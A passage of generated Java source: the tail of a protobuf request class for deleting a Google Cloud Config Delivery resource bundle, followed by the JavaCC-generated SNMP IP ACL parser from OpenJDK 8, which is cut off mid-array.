*/ public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The bytes for requestId. */ public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. 
If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @param value The requestId to set. * @return This builder for chaining. */ public Builder setRequestId(java.lang.String value) { if (value == null) { throw new NullPointerException(); } requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearRequestId() { requestId_ = getDefaultInstance().getRequestId(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. 
Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @param value The bytes for requestId to set. * @return This builder for chaining. */ public Builder setRequestIdBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private boolean force_; /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The force. */ @java.lang.Override public boolean getForce() { return force_; } /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The force to set. * @return This builder for chaining. 
*/ public Builder setForce(boolean value) { force_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearForce() { bitField0_ = (bitField0_ & ~0x00000004); force_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) } // @@protoc_insertion_point(class_scope:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) private static final com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest(); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<DeleteResourceBundleRequest> PARSER = new com.google.protobuf.AbstractParser<DeleteResourceBundleRequest>() { @java.lang.Override public DeleteResourceBundleRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw 
e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<DeleteResourceBundleRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<DeleteResourceBundleRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
openjdk/jdk8
35,677
jdk/src/share/classes/com/sun/jmx/snmp/IPAcl/Parser.java
/* * Copyright (c) 1997, 2012, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ /* Generated By:JJTree&JavaCC: Do not edit this line. 
Parser.java */ package com.sun.jmx.snmp.IPAcl; import java.io.*; @SuppressWarnings("unchecked") // generated code, not worth fixing class Parser/*@bgen(jjtree)*/implements ParserTreeConstants, ParserConstants {/*@bgen(jjtree)*/ protected JJTParserState jjtree = new JJTParserState(); // A file can contain several acl definitions // final public JDMSecurityDefs SecurityDefs() throws ParseException { /*@bgen(jjtree) SecurityDefs */ JDMSecurityDefs jjtn000 = new JDMSecurityDefs(JJTSECURITYDEFS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case ACL: AclBlock(); break; default: jj_la1[0] = jj_gen; ; } switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case TRAP: TrapBlock(); break; default: jj_la1[1] = jj_gen; ; } switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case INFORM: InformBlock(); break; default: jj_la1[2] = jj_gen; ; } jj_consume_token(0); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; {if (true) return jjtn000;} } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void AclBlock() throws ParseException { /*@bgen(jjtree) AclBlock */ JDMAclBlock jjtn000 = new JDMAclBlock(JJTACLBLOCK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(ACL); jj_consume_token(ASSIGN); jj_consume_token(LBRACE); label_1: while (true) { AclItem(); switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[3] = jj_gen; break label_1; } } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } 
if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void AclItem() throws ParseException { /*@bgen(jjtree) AclItem */ JDMAclItem jjtn000 = new JDMAclItem(JJTACLITEM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(LBRACE); jjtn000.com = Communities(); jjtn000.access = Access(); Managers(); jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMCommunities Communities() throws ParseException { /*@bgen(jjtree) Communities */ JDMCommunities jjtn000 = new JDMCommunities(JJTCOMMUNITIES); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(COMMUNITIES); jj_consume_token(ASSIGN); Community(); label_2: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[4] = jj_gen; break label_2; } jj_consume_token(COMMA); Community(); } jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; {if (true) return jjtn000;} } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } 
final public void Community() throws ParseException { /*@bgen(jjtree) Community */ JDMCommunity jjtn000 = new JDMCommunity(JJTCOMMUNITY); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(IDENTIFIER); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.communityString= t.image; } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMAccess Access() throws ParseException { /*@bgen(jjtree) Access */ JDMAccess jjtn000 = new JDMAccess(JJTACCESS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(ACCESS); jj_consume_token(ASSIGN); switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case RO: jj_consume_token(RO); jjtn000.access= RO; break; case RW: jj_consume_token(RW); jjtn000.access= RW; break; default: jj_la1[5] = jj_gen; jj_consume_token(-1); throw new ParseException(); } jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; {if (true) return jjtn000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void Managers() throws ParseException { /*@bgen(jjtree) Managers */ JDMManagers jjtn000 = new JDMManagers(JJTMANAGERS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(MANAGERS); jj_consume_token(ASSIGN); Host(); label_3: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[6] = jj_gen; break label_3; } jj_consume_token(COMMA); Host(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void Host() throws ParseException { /*@bgen(jjtree) Host */ JDMHost 
jjtn000 = new JDMHost(JJTHOST); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case IDENTIFIER: HostName(); break; default: jj_la1[7] = jj_gen; if (jj_2_1(2147483647)) { NetMask(); } else if (jj_2_2(2147483647)) { NetMaskV6(); } else if (jj_2_3(2147483647)) { IpAddress(); } else { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case V6_ADDRESS: IpV6Address(); break; case INTEGER_LITERAL: IpMask(); break; default: jj_la1[8] = jj_gen; jj_consume_token(-1); throw new ParseException(); } } } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void HostName() throws ParseException { /*@bgen(jjtree) HostName */ JDMHostName jjtn000 = new JDMHostName(JJTHOSTNAME); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(IDENTIFIER); jjtn000.name.append(t.image); label_4: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case DOT: ; break; default: jj_la1[9] = jj_gen; break label_4; } jj_consume_token(DOT); t = jj_consume_token(IDENTIFIER); jjtn000.name.append( "." 
+ t.image); } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void IpAddress() throws ParseException { /*@bgen(jjtree) IpAddress */ JDMIpAddress jjtn000 = new JDMIpAddress(JJTIPADDRESS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append(t.image); label_5: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case DOT: ; break; default: jj_la1[10] = jj_gen; break label_5; } jj_consume_token(DOT); t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append( "." + t.image); } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void IpV6Address() throws ParseException { /*@bgen(jjtree) IpV6Address */ JDMIpV6Address jjtn000 = new JDMIpV6Address(JJTIPV6ADDRESS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(V6_ADDRESS); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.address.append(t.image); } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void IpMask() throws ParseException { /*@bgen(jjtree) IpMask */ JDMIpMask jjtn000 = new JDMIpMask(JJTIPMASK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append(t.image); label_6: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case MARK: ; break; default: jj_la1[11] = jj_gen; break label_6; } jj_consume_token(MARK); t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append( "." 
+ t.image); } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void NetMask() throws ParseException { /*@bgen(jjtree) NetMask */ JDMNetMask jjtn000 = new JDMNetMask(JJTNETMASK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append(t.image); label_7: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case DOT: ; break; default: jj_la1[12] = jj_gen; break label_7; } jj_consume_token(DOT); t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append( "." + t.image); } jj_consume_token(MASK); t = jj_consume_token(INTEGER_LITERAL); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.mask = t.image; } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void NetMaskV6() throws ParseException { /*@bgen(jjtree) NetMaskV6 */ JDMNetMaskV6 jjtn000 = new JDMNetMaskV6(JJTNETMASKV6); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(V6_ADDRESS); jjtn000.address.append(t.image); jj_consume_token(MASK); t = jj_consume_token(INTEGER_LITERAL); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.mask = t.image; } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void TrapBlock() throws ParseException { /*@bgen(jjtree) TrapBlock */ JDMTrapBlock jjtn000 = new JDMTrapBlock(JJTTRAPBLOCK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(TRAP); jj_consume_token(ASSIGN); jj_consume_token(LBRACE); label_8: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[13] = jj_gen; break label_8; } TrapItem(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if 
(true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void TrapItem() throws ParseException { /*@bgen(jjtree) TrapItem */ JDMTrapItem jjtn000 = new JDMTrapItem(JJTTRAPITEM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(LBRACE); jjtn000.comm = TrapCommunity(); TrapInterestedHost(); label_9: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[14] = jj_gen; break label_9; } Enterprise(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMTrapCommunity TrapCommunity() throws ParseException { /*@bgen(jjtree) TrapCommunity */ JDMTrapCommunity jjtn000 = new JDMTrapCommunity(JJTTRAPCOMMUNITY); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { jj_consume_token(TRAPCOMMUNITY); jj_consume_token(ASSIGN); t = jj_consume_token(IDENTIFIER); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.community= t.image; {if (true) return jjtn000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void TrapInterestedHost() throws ParseException { /*@bgen(jjtree) TrapInterestedHost */ JDMTrapInterestedHost jjtn000 = new JDMTrapInterestedHost(JJTTRAPINTERESTEDHOST); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(HOSTS); jj_consume_token(ASSIGN); HostTrap(); label_10: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[15] = jj_gen; break 
label_10; } jj_consume_token(COMMA); HostTrap(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void HostTrap() throws ParseException { /*@bgen(jjtree) HostTrap */ JDMHostTrap jjtn000 = new JDMHostTrap(JJTHOSTTRAP); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case IDENTIFIER: HostName(); break; case INTEGER_LITERAL: IpAddress(); break; case V6_ADDRESS: IpV6Address(); break; default: jj_la1[16] = jj_gen; jj_consume_token(-1); throw new ParseException(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void Enterprise() throws ParseException { /*@bgen(jjtree) Enterprise */ JDMEnterprise jjtn000 = new JDMEnterprise(JJTENTERPRISE); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { jj_consume_token(LBRACE); jj_consume_token(ENTERPRISE); jj_consume_token(ASSIGN); t = jj_consume_token(CSTRING); jjtn000.enterprise= t.image; jj_consume_token(TRAPNUM); jj_consume_token(ASSIGN); TrapNum(); label_11: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[17] = jj_gen; break label_11; } jj_consume_token(COMMA); TrapNum(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); 
jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void TrapNum() throws ParseException { /*@bgen(jjtree) TrapNum */ JDMTrapNum jjtn000 = new JDMTrapNum(JJTTRAPNUM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.low= Integer.parseInt(t.image); switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case RANGE: jj_consume_token(RANGE); t = jj_consume_token(INTEGER_LITERAL); jjtn000.high= Integer.parseInt(t.image); break; default: jj_la1[18] = jj_gen; ; } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void InformBlock() throws ParseException { /*@bgen(jjtree) InformBlock */ JDMInformBlock jjtn000 = new JDMInformBlock(JJTINFORMBLOCK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(INFORM); jj_consume_token(ASSIGN); jj_consume_token(LBRACE); label_12: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[19] = jj_gen; break label_12; } InformItem(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void InformItem() throws ParseException { /*@bgen(jjtree) InformItem */ JDMInformItem jjtn000 = new JDMInformItem(JJTINFORMITEM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(LBRACE); jjtn000.comm = 
InformCommunity(); InformInterestedHost(); jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMInformCommunity InformCommunity() throws ParseException { /*@bgen(jjtree) InformCommunity */ JDMInformCommunity jjtn000 = new JDMInformCommunity(JJTINFORMCOMMUNITY); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { jj_consume_token(INFORMCOMMUNITY); jj_consume_token(ASSIGN); t = jj_consume_token(IDENTIFIER); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.community= t.image; {if (true) return jjtn000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void InformInterestedHost() throws ParseException { /*@bgen(jjtree) InformInterestedHost */ JDMInformInterestedHost jjtn000 = new JDMInformInterestedHost(JJTINFORMINTERESTEDHOST); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(HOSTS); jj_consume_token(ASSIGN); HostInform(); label_13: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[20] = jj_gen; break label_13; } jj_consume_token(COMMA); HostInform(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void HostInform() throws 
ParseException { /*@bgen(jjtree) HostInform */ JDMHostInform jjtn000 = new JDMHostInform(JJTHOSTINFORM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case IDENTIFIER: HostName(); break; case INTEGER_LITERAL: IpAddress(); break; case V6_ADDRESS: IpV6Address(); break; default: jj_la1[21] = jj_gen; jj_consume_token(-1); throw new ParseException(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final private boolean jj_2_1(int xla) { jj_la = xla; jj_lastpos = jj_scanpos = token; boolean retval = !jj_3_1(); jj_save(0, xla); return retval; } final private boolean jj_2_2(int xla) { jj_la = xla; jj_lastpos = jj_scanpos = token; boolean retval = !jj_3_2(); jj_save(1, xla); return retval; } final private boolean jj_2_3(int xla) { jj_la = xla; jj_lastpos = jj_scanpos = token; boolean retval = !jj_3_3(); jj_save(2, xla); return retval; } final private boolean jj_3_3() { if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(DOT)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } final private boolean jj_3_2() { if (jj_scan_token(V6_ADDRESS)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(MASK)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } final private boolean jj_3_1() { if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return 
false; Token xsp; while (true) { xsp = jj_scanpos; if (jj_3R_14()) { jj_scanpos = xsp; break; } if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; } if (jj_scan_token(MASK)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } final private boolean jj_3R_14() { if (jj_scan_token(DOT)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; if (jj_scan_token(INTEGER_LITERAL)) return true; if (jj_la == 0 && jj_scanpos == jj_lastpos) return false; return false; } public ParserTokenManager token_source; ASCII_CharStream jj_input_stream; public Token token, jj_nt; private int jj_ntk; private Token jj_scanpos, jj_lastpos; private int jj_la; public boolean lookingAhead = false; private boolean jj_semLA; private int jj_gen; final private int[] jj_la1 = new int[22]; final private int[] jj_la1_0 = {0x100,0x80000,0x100000,0x2000,0x0,0x60000,0x0,0x80000000,0x11000000,0x0,0x0,0x0,0x0,0x2000,0x2000,0x0,0x91000000,0x0,0x8000,0x2000,0x0,0x91000000,}; final private int[] jj_la1_1 = 